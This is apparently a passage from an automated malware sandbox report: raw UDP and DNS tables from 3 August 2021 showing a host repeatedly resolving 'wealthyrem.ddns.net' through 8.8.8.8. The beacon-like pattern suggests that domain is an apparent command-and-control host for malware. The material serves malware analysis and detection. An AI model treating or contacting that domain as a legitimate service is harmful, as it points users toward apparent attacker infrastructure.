                  Aug 3, 2021 19:05:14.958893061 CEST53622418.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:17.109873056 CEST5054353192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:17.145004988 CEST53505438.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:19.332648039 CEST5644553192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:19.365232944 CEST53564458.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:21.520255089 CEST5670953192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:21.552804947 CEST53567098.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:23.720985889 CEST5124853192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:23.757006884 CEST53512488.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:25.923397064 CEST4967953192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:25.959387064 CEST53496798.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:28.157883883 CEST5026353192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:28.191822052 CEST53502638.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:30.346065044 CEST4921553192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:30.381278038 CEST53492158.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:32.537942886 CEST6437253192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:32.573491096 CEST53643728.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:34.719111919 CEST5001653192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:34.744133949 CEST53500168.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:36.924958944 CEST6132553192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:36.961061954 CEST53613258.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:39.130440950 CEST4916053192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:39.165993929 CEST53491608.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:41.315402031 CEST5126553192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:41.342091084 CEST53512658.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:43.540107012 CEST5200653192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:43.572525024 CEST53520068.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:45.754501104 CEST5869753192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:45.787534952 CEST53586978.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:47.940515041 CEST5153053192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:47.976157904 CEST53515308.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:50.126950026 CEST5098953192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:50.160826921 CEST53509898.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:52.331804991 CEST5332353192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:52.357184887 CEST53533238.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:54.534140110 CEST5903453192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:54.568398952 CEST53590348.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:56.720890045 CEST5310653192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:56.756485939 CEST53531068.8.8.8192.168.2.3
                  Aug 3, 2021 19:05:58.957617998 CEST6213253192.168.2.38.8.8.8
                  Aug 3, 2021 19:05:58.990415096 CEST53621328.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:01.144287109 CEST5448953192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:01.181267023 CEST53544898.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:03.333826065 CEST6439053192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:03.364897013 CEST53643908.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:05.550487041 CEST5836953192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:05.585144997 CEST53583698.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:07.741825104 CEST6420353192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:07.775700092 CEST53642038.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:09.941957951 CEST4923253192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:09.969455957 CEST53492328.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:12.149107933 CEST5255853192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:12.181878090 CEST53525588.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:15.198581934 CEST5355553192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:15.233902931 CEST53535558.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:17.397550106 CEST5008353192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:17.436507940 CEST53500838.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:19.587477922 CEST4980453192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:19.619803905 CEST53498048.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:21.772907972 CEST6296353192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:21.808489084 CEST53629638.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:23.959944010 CEST6369553192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:23.992546082 CEST53636958.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:26.166287899 CEST6429653192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:26.202452898 CEST53642968.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:28.366338015 CEST6084453192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:28.401519060 CEST53608448.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:30.600789070 CEST6391753192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:30.626837969 CEST53639178.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:32.799395084 CEST5185153192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:32.831609011 CEST53518518.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:34.995313883 CEST4989853192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:35.025839090 CEST53498988.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:37.197623014 CEST4963253192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:37.231322050 CEST53496328.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:39.385412931 CEST6536153192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:39.421473026 CEST53653618.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:41.637833118 CEST5020653192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:41.665680885 CEST53502068.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:43.841898918 CEST4961353192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:43.874284983 CEST53496138.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:46.065788031 CEST6303253192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:46.092864037 CEST53630328.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:48.259576082 CEST5489853192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:48.294316053 CEST53548988.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:50.478462934 CEST6171053192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:50.514136076 CEST53617108.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:52.664053917 CEST5207353192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:52.690589905 CEST53520738.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:54.146475077 CEST6394953192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:54.193475962 CEST53639498.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:54.869762897 CEST5756153192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:54.903347015 CEST53575618.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:57.063138962 CEST5320553192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:57.096909046 CEST53532058.8.8.8192.168.2.3
                  Aug 3, 2021 19:06:59.274760008 CEST6057953192.168.2.38.8.8.8
                  Aug 3, 2021 19:06:59.308945894 CEST53605798.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:01.536617041 CEST4976553192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:01.572048903 CEST53497658.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:03.743144989 CEST5765053192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:03.779144049 CEST53576508.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:05.939706087 CEST6531753192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:05.974879980 CEST53653178.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:08.149225950 CEST6465453192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:08.178571939 CEST53646548.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:10.377194881 CEST5119153192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:10.413378954 CEST53511918.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:12.588496923 CEST6387053192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:12.616333008 CEST53638708.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:14.790198088 CEST5701353192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:14.823110104 CEST53570138.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:17.232678890 CEST5874553192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:17.267951012 CEST53587458.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:19.495464087 CEST6427253192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:19.534274101 CEST53642728.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:21.703489065 CEST5644053192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:21.735933065 CEST53564408.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:23.890366077 CEST5949253192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:23.916037083 CEST53594928.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:26.093004942 CEST6212553192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:26.126003981 CEST53621258.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:28.307390928 CEST6177653192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:28.345453024 CEST53617768.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:28.732209921 CEST5392853192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:28.773401976 CEST53539288.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:30.528975964 CEST5105853192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:30.567393064 CEST53510588.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:32.768989086 CEST5671153192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:32.802838087 CEST53567118.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:35.004992008 CEST5478053192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:35.040189981 CEST53547808.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:37.205674887 CEST5430553192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:37.239572048 CEST53543058.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:39.391149044 CEST6166953192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:39.415898085 CEST53616698.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:41.593108892 CEST5733653192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:41.625711918 CEST53573368.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:43.791191101 CEST6457753192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:43.823787928 CEST53645778.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:45.981834888 CEST6498753192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:46.009243011 CEST53649878.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:48.208339930 CEST5865553192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:48.245440960 CEST53586558.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:50.405112028 CEST6090553192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:50.439282894 CEST53609058.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:52.700977087 CEST6277653192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:52.736202002 CEST53627768.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:54.903065920 CEST5692353192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:54.935384989 CEST53569238.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:57.106620073 CEST6520153192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:57.142123938 CEST53652018.8.8.8192.168.2.3
                  Aug 3, 2021 19:07:59.292171955 CEST5426453192.168.2.38.8.8.8
                  Aug 3, 2021 19:07:59.324852943 CEST53542648.8.8.8192.168.2.3
                  Aug 3, 2021 19:08:01.496685028 CEST5843953192.168.2.38.8.8.8
                  Aug 3, 2021 19:08:01.529334068 CEST53584398.8.8.8192.168.2.3
                  Aug 3, 2021 19:08:03.698606014 CEST5423553192.168.2.38.8.8.8
                  Aug 3, 2021 19:08:03.731192112 CEST53542358.8.8.8192.168.2.3

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Aug 3, 2021 19:01:32.114979982 CEST192.168.2.38.8.8.80x4f55Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:34.315417051 CEST192.168.2.38.8.8.80xc0f9Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:36.516494036 CEST192.168.2.38.8.8.80xb853Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:38.721241951 CEST192.168.2.38.8.8.80x4c0Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:40.908818960 CEST192.168.2.38.8.8.80x8464Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:43.099242926 CEST192.168.2.38.8.8.80x1298Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:45.284416914 CEST192.168.2.38.8.8.80x2508Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:47.753312111 CEST192.168.2.38.8.8.80x95ddStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:50.319245100 CEST192.168.2.38.8.8.80x91d3Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:52.518642902 CEST192.168.2.38.8.8.80x3f8eStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:54.722306013 CEST192.168.2.38.8.8.80x64f4Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:56.924621105 CEST192.168.2.38.8.8.80x58e4Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:01:59.130711079 CEST192.168.2.38.8.8.80xae14Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:01.320058107 CEST192.168.2.38.8.8.80x9d7bStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:03.553585052 CEST192.168.2.38.8.8.80xf106Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:07.920561075 CEST192.168.2.38.8.8.80xcfbcStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:10.120966911 CEST192.168.2.38.8.8.80xb28dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:12.344211102 CEST192.168.2.38.8.8.80xf8d3Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:14.686839104 CEST192.168.2.38.8.8.80xabd4Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:16.953767061 CEST192.168.2.38.8.8.80x296Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:19.211441040 CEST192.168.2.38.8.8.80x4268Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:21.429611921 CEST192.168.2.38.8.8.80xb8c4Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:23.626596928 CEST192.168.2.38.8.8.80xd8c3Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:25.812108994 CEST192.168.2.38.8.8.80xe46dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:28.016876936 CEST192.168.2.38.8.8.80xe1a4Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:30.218873978 CEST192.168.2.38.8.8.80x95e9Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:32.420996904 CEST192.168.2.38.8.8.80xef1Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:34.679191113 CEST192.168.2.38.8.8.80xb849Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:36.880808115 CEST192.168.2.38.8.8.80x4e81Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:39.080692053 CEST192.168.2.38.8.8.80xd3b6Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:41.443295956 CEST192.168.2.38.8.8.80x6608Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:43.643707991 CEST192.168.2.38.8.8.80x7d7eStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:45.850692987 CEST192.168.2.38.8.8.80x8d99Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:48.038158894 CEST192.168.2.38.8.8.80xbc7cStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:50.265275955 CEST192.168.2.38.8.8.80xf886Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:52.473217964 CEST192.168.2.38.8.8.80xffStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:54.709424973 CEST192.168.2.38.8.8.80x7c6bStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:02:57.038458109 CEST192.168.2.38.8.8.80xd11bStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:00.213896036 CEST192.168.2.38.8.8.80x8a1bStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:02.430080891 CEST192.168.2.38.8.8.80xa63Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:04.613842010 CEST192.168.2.38.8.8.80x48fdStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:06.893040895 CEST192.168.2.38.8.8.80x9167Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:09.084055901 CEST192.168.2.38.8.8.80x62edStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:11.271615028 CEST192.168.2.38.8.8.80xf165Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:13.477817059 CEST192.168.2.38.8.8.80x3d90Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:15.679207087 CEST192.168.2.38.8.8.80xf3a8Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:17.865520954 CEST192.168.2.38.8.8.80x1e50Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:20.084985018 CEST192.168.2.38.8.8.80xea4bStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:22.322797060 CEST192.168.2.38.8.8.80x9268Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:24.522763014 CEST192.168.2.38.8.8.80x2dbaStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:26.742661953 CEST192.168.2.38.8.8.80xe4f0Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:28.930773973 CEST192.168.2.38.8.8.80xf843Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:31.135622978 CEST192.168.2.38.8.8.80x7112Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:33.318119049 CEST192.168.2.38.8.8.80x5739Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:35.511454105 CEST192.168.2.38.8.8.80x752Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:37.775151014 CEST192.168.2.38.8.8.80xa606Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:39.970947981 CEST192.168.2.38.8.8.80x5794Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:42.164659977 CEST192.168.2.38.8.8.80xc21dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:44.354120970 CEST192.168.2.38.8.8.80x50aeStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:46.570506096 CEST192.168.2.38.8.8.80xab70Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:48.773654938 CEST192.168.2.38.8.8.80xf7a2Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:50.951783895 CEST192.168.2.38.8.8.80xc7d0Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:53.197990894 CEST192.168.2.38.8.8.80x2ac8Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:55.415544033 CEST192.168.2.38.8.8.80xdb67Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:57.632731915 CEST192.168.2.38.8.8.80x8876Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:03:59.824805975 CEST192.168.2.38.8.8.80xdd4aStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:02.424027920 CEST192.168.2.38.8.8.80x40a4Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:05.025619984 CEST192.168.2.38.8.8.80xc20bStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:07.243323088 CEST192.168.2.38.8.8.80xe42aStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:09.483490944 CEST192.168.2.38.8.8.80xba28Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:11.765233040 CEST192.168.2.38.8.8.80xddb0Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:14.084388971 CEST192.168.2.38.8.8.80xfeb0Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:16.275333881 CEST192.168.2.38.8.8.80xa694Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:18.478743076 CEST192.168.2.38.8.8.80xa8c7Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:20.698674917 CEST192.168.2.38.8.8.80x5126Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:22.901813030 CEST192.168.2.38.8.8.80xa630Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:25.226316929 CEST192.168.2.38.8.8.80xf5bStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:27.418201923 CEST192.168.2.38.8.8.80xc235Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:29.614897013 CEST192.168.2.38.8.8.80x7a7cStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:31.996125937 CEST192.168.2.38.8.8.80xd305Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:34.188719988 CEST192.168.2.38.8.8.80x8c28Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:36.419224977 CEST192.168.2.38.8.8.80x8a03Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:38.651132107 CEST192.168.2.38.8.8.80x6df8Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:40.952564955 CEST192.168.2.38.8.8.80x5512Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:43.204242945 CEST192.168.2.38.8.8.80x346eStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:45.405143023 CEST192.168.2.38.8.8.80xbe48Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:47.623676062 CEST192.168.2.38.8.8.80x2dc6Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:49.844846964 CEST192.168.2.38.8.8.80x5442Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:52.075742960 CEST192.168.2.38.8.8.80x907dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:54.286129951 CEST192.168.2.38.8.8.80x3c36Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:56.573766947 CEST192.168.2.38.8.8.80x68b3Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:04:58.795171022 CEST192.168.2.38.8.8.80x9bf3Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:01.028712034 CEST192.168.2.38.8.8.80x9486Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:03.249236107 CEST192.168.2.38.8.8.80xed32Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:05.473995924 CEST192.168.2.38.8.8.80x26d6Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:07.687529087 CEST192.168.2.38.8.8.80xef65Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:10.196857929 CEST192.168.2.38.8.8.80x173bStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:12.714188099 CEST192.168.2.38.8.8.80x71dcStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:14.921039104 CEST192.168.2.38.8.8.80xcd49Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:17.109873056 CEST192.168.2.38.8.8.80x954dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:19.332648039 CEST192.168.2.38.8.8.80x4205Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:21.520255089 CEST192.168.2.38.8.8.80x8926Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:23.720985889 CEST192.168.2.38.8.8.80x821Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:25.923397064 CEST192.168.2.38.8.8.80x96ceStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:28.157883883 CEST192.168.2.38.8.8.80x4e8Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:30.346065044 CEST192.168.2.38.8.8.80xa5e8Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:32.537942886 CEST192.168.2.38.8.8.80x555dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:34.719111919 CEST192.168.2.38.8.8.80x5059Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:36.924958944 CEST192.168.2.38.8.8.80x7b1bStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
                  Aug 3, 2021 19:05:39.130440950 CEST192.168.2.38.8.8.80x428eStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
